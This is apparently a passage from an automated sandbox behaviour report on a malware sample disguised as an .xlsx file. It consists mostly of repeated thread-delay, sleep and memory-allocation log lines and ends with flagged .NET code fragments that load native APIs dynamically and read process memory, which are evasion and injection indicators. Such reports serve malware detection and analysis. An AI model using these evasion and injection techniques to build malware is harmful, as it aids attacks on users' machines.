                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 4CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 2260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: 4430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599737Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599609Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599499Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599390Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599281Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599171Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599062Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598624Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598515Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598296Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598187Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597964Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597625Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597515Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597404Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597294Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597046Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596713Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596374Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594951Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594624Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeWindow / User API: threadDelayed 1845Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeWindow / User API: threadDelayed 7997Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeWindow / User API: foregroundWindowGot 1588Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 5480Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 2640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599737s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599499s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -599062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -598078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597964s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597404s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597294s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -597046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596713s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -596046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -594951s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -594624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599859Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599737Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599609Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599499Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599390Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599281Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599171Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 599062Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598624Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598515Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598296Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598187Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597964Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597625Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597515Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597404Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597294Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 597046Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596713Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596374Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594951Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594624Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeThread delayed: delay time: 594515Jump to behavior
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4129215635.00000000007D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E9548 LdrInitializeThunk,1_2_060E9548
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: 0.2.DC74433Y7889021.xlsx.exe.2d3a538.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                    Source: 0.2.DC74433Y7889021.xlsx.exe.2d3a538.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                    Source: 0.2.DC74433Y7889021.xlsx.exe.2d3a538.1.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
